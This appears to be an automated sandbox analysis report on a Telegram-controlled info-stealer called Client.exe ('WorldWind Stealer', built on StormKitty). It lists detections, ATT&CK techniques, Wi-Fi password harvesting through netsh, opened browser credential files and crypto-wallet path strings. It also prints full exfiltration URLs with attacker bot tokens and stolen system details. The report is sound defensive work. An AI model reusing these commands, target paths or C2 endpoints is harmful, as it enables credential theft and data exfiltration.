                                  Source: C:\Users\user\Desktop\Client.exeQueries volume information: C:\Users\user\Desktop\Client.exe VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: Client.exe, 00000000.00000002.4570320604.0000000005E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                                  Source: Client.exe, 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  11
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  File and Directory Discovery
                                  Remote Services1
                                  Archive Collected Data
                                  1
                                  Web Service
                                  Exfiltration Over Other Network Medium1
                                  Data Encrypted for Impact
                                  CredentialsDomainsDefault Accounts2
                                  Command and Scripting Interpreter
                                  1
                                  Scheduled Task/Job
                                  11
                                  Process Injection
                                  111
                                  Obfuscated Files or Information
                                  1
                                  Input Capture
                                  134
                                  System Information Discovery
                                  Remote Desktop Protocol2
                                  Data from Local System
                                  1
                                  Ingress Tool Transfer
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts1
                                  Scheduled Task/Job
                                  Logon Script (Windows)1
                                  Scheduled Task/Job
                                  1
                                  Timestomp
                                  Security Account Manager1
                                  Query Registry
                                  SMB/Windows Admin Shares1
                                  Screen Capture
                                  11
                                  Encrypted Channel
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                                  DLL Side-Loading
                                  NTDS341
                                  Security Software Discovery
                                  Distributed Component Object Model1
                                  Input Capture
                                  3
                                  Non-Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  Masquerading
                                  LSA Secrets1
                                  Process Discovery
                                  SSHKeylogging4
                                  Application Layer Protocol
                                  Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                                  Virtualization/Sandbox Evasion
                                  Cached Domain Credentials251
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                  Process Injection
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501596 Sample: Client.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 72.245.12.0.in-addr.arpa 2->42 44 2 other IPs or domains 2->44 52 Multi AV Scanner detection for domain / URL 2->52 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 60 15 other signatures 2->60 8 Client.exe 15 188 2->8         started        signatures3 58 Uses the Telegram API (likely for C&C communication) 40->58 process4 dnsIp5 46 api.telegram.org 149.154.167.220, 443, 49714, 49715 TELEGRAMRU United Kingdom 8->46 48 127.0.0.1 unknown unknown 8->48 50 2 other IPs or domains 8->50 32 C:\Users\user\AppData\...\SFPUSAFIOL.docx, ASCII 8->32 dropped 34 C:\Users\user\AppData\...FOYFBOLXA.jpg, ASCII 8->34 dropped 36 C:\Users\user\AppData\...\BNAGMGSPLO.pdf, ASCII 8->36 dropped 38 2 other malicious files 8->38 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->66 68 3 other signatures 8->68 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        file6 signatures7 process8 signatures9 70 Uses netsh to modify the Windows network and firewall settings 13->70 72 Tries to harvest and steal WLAN passwords 13->72 18 netsh.exe 2 13->18         started        20 conhost.exe 13->20         started        22 findstr.exe 1 13->22         started        24 chcp.com 1 13->24         started        26 netsh.exe 2 16->26         started        28 conhost.exe 16->28         started        30 chcp.com 1 16->30         started        process10

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  Client.exe82%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                  Client.exe89%VirustotalBrowse
                                  Client.exe100%AviraHEUR/AGEN.1307527
                                  Client.exe100%Joe Sandbox ML
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  api.mylnikov.org3%VirustotalBrowse
                                  api.telegram.org2%VirustotalBrowse
                                  icanhazip.com0%VirustotalBrowse
                                  72.245.12.0.in-addr.arpa0%VirustotalBrowse
                                  SourceDetectionScannerLabelLink
                                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%URL Reputationsafe
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                  https://support.mozilla.org0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                                  https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.130%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=161910%Avira URL Cloudsafe
                                  https://api.telegram.org0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10960%Avira URL Cloudsafe
                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:150%Avira URL Cloudsafe
                                  https://api.telegram.org1%VirustotalBrowse
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.139%VirustotalBrowse
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=16190%Avira URL Cloudsafe
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10962%VirustotalBrowse
                                  https://api.telegram.orgD0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=161912%VirustotalBrowse
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...1%VirustotalBrowse
                                  http://icanhazip.com/0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot1%VirustotalBrowse
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=16191366280%Avira URL Cloudsafe
                                  https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
                                  https://github.com/LimerBoy/StormKitty0&0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send2%VirustotalBrowse
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10964258660%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=16192%VirustotalBrowse
                                  https://github.com/LimerBoy/StormKitty2%VirustotalBrowse
                                  http://api.telegram.orgd0%Avira URL Cloudsafe
                                  http://icanhazip.com/0%VirustotalBrowse
                                  https://api.telegram.org/file/bot0%Avira URL Cloudsafe
                                  http://api.telegram.org0%Avira URL Cloudsafe
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=16191366281%VirustotalBrowse
                                  https://api.telegram.org/file/bot0%VirustotalBrowse
                                  http://api.telegram.org2%VirustotalBrowse
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10964258662%VirustotalBrowse
                                  https://github.com/LimerBoy/StormKitty0&2%VirustotalBrowse
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  api.mylnikov.org
                                  172.67.196.114
                                  truefalseunknown
                                  api.telegram.org
                                  149.154.167.220
                                  truetrueunknown
                                  icanhazip.com
                                  104.16.185.241
                                  truefalseunknown
                                  72.245.12.0.in-addr.arpa
                                  unknown
                                  unknowntrueunknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders...true
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://icanhazip.com/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628true
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=Truetrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866true
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabtmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13Client.exefalse
                                  • 9%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.orgClient.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/botClient.exetrue
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendClient.exetrue
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.orgDClient.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.ecosia.org/newtab/tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpE267.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/LimerBoy/StormKittyClient.exefalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYttmpE267.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/LimerBoy/StormKitty0&Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://api.telegram.orgdClient.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.mozilla.orgtmpE267.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/file/botClient.exefalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://api.telegram.orgClient.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
